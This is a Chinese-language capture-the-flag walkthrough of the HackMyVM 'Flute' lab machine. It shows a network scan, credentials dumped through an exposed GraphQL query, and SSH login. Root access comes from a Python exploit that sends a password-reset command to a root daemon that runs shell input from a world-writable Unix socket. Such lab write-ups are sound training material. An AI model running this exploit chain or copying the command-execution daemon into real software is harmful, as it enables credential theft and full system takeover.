Hvm_Flute

靶机来源：https://hackmyvm.eu/

难度：Easy

思维导图：

一、信息收集

1、主机探测

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:33 +0800
Nmap scan report for 192.168.2.1
Host is up (0.00094s latency).
MAC Address: 0A:00:27:00:00:06 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00059s latency).
MAC Address: 08:00:27:AD:F2:D7 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.12
Host is up (0.0012s latency).
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 7.65 seconds

靶机IP：192.168.2.12

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.12                   
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:33 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00078s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 49.44 seconds

开放端口：22、8888

2.详细信息扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap --min-rate 10000 -sT -sC -sV -O -p22,8888 192.168.2.12
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:34 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00073s latency).

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 10.0 (protocol 2.0)
8888/tcp open  sun-answerbook?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, JavaRMI, LSCP, RPCCheck, SSLSessionReq, TLSSessionReq, TerminalServerCookie: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   FourOhFourRequest, GetRequest: 
|     HTTP/1.1 400 Bad Request
|     Access-Control-Allow-Origin: *
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 18
|     ETag: W/"12-7JEJwpG8g89ii7CR/6hhfN27Q+k"
|     Date: Tue, 31 Mar 2026 09:34:48 GMT
|     Connection: close
|     query missing.
|   HTTPOptions: 
|     HTTP/1.1 204 No Content
|     Access-Control-Allow-Origin: *
|     Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
|     Vary: Access-Control-Request-Headers
|     Content-Length: 0
|     Date: Tue, 31 Mar 2026 09:34:48 GMT
|     Connection: close
|   RTSPRequest: 
|     HTTP/1.1 204 No Content
|     Access-Control-Allow-Origin: *
|     Access-Control-Allow-Methods: GET,HEAD,PUT,PATCH,POST,DELETE
|     Vary: Access-Control-Request-Headers
|     Content-Length: 0
|     Date: Tue, 31 Mar 2026 09:34:53 GMT
|_    Connection: close
...
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4)
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.62 seconds

3.udp扫描

┌──(root㉿kali)-[~/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.12                      
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 17:35 +0800
Nmap scan report for 192.168.2.12
Host is up (0.00069s latency).
All 100 scanned ports on 192.168.2.12 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:90:71:F5 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 101.68 seconds

二、WEB渗透

1、8888端口

访问8888端口，是apollo服务器的默认页面

2、GraphQL

查看文档的使用方法，直接查看用户名和密码

curl --request POST \ --header 'content-type: application/json' \ --url 'http://192.168.2.12:8888/' \ --data '{"query":"query { users { username password } }"}'

成功获取到登录凭证

┌──(root㉿kali)-[~/miaosec]
└─# curl --request POST \
  --header 'content-type: application/json' \
  --url 'http://192.168.2.12:8888/' \
  --data '{"query":"query { users { username password } }"}'
{"data":{"users":[{"username":"admin","password":"imtherealadmin"},{"username":"hamelin","password":"comewithmerats"}]}}

三、获取hamelin权限

使用获取的凭证：hamelin:comewithmerats进行登录

┌──(root㉿kali)-[~]
└─# ssh hamelin@192.168.2.12                                                         
hamelin@192.168.2.12's password: 
HackMyVM Flute.
flute:~$ id
uid=1000(hamelin) gid=1000(hamelin) groups=1000(hamelin)

四、权限提升

在/opt下面找到一个Python脚本

flute:~$ ls -la /opt/ratd/
total 12
drwxr-xr-x    2 root     root          4096 Mar 30 09:42 .
drwxr-xr-x    3 root     root          4096 Mar 30 09:41 ..
-rw-r--r--    1 root     root           527 Mar 30 09:42 ratd.py

查看ratd.py

flute:~$ cat /opt/ratd/ratd.py 
import socket
import os

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
socket_path = "/tmp/ratd.sock"

if os.path.exists(socket_path):
    os.remove(socket_path)

sock.bind(socket_path)
os.chmod(socket_path, 0o777)
sock.listen(1)

print("Rat daemon running...")

while True:
    conn, _ = sock.accept()
    data = conn.recv(1024).decode()

    if data.startswith("RUN "):
        cmd = data[4:]
        os.system(cmd)   
        conn.send(b"OK\n")
    else:
        conn.send(b"Unknown command\n")

    conn.close()

这个脚本实现了一个基于 Unix Domain Socket 的简易“后门”或守护进程。它监听一个本地套接字文件，接收外部指令并直接调用系统 Shell 执行命令

可以直接进行利用

import socket
import os

sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
sock.connect("/tmp/ratd.sock")

# 发送恶意命令，直接修改root用户的密码
cmd = "RUN echo 'root:1234567' | chpasswd"
sock.send(cmd.encode())

print(sock.recv(1024).decode())
sock.close()

成功获取到root权限

flute:~$ nano exp.py 
flute:~$ python3 exp.py 
OK

flute:~$ su root
Password: 1234567
/home/hamelin # id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

五、查看FLAG

/home/hamelin # cat /root/root.txt /home/hamelin/user.txt 
HMVrootoepsamqu0liphzzsc7x9
HMVuser9f4ndbaz4chc6j04b3va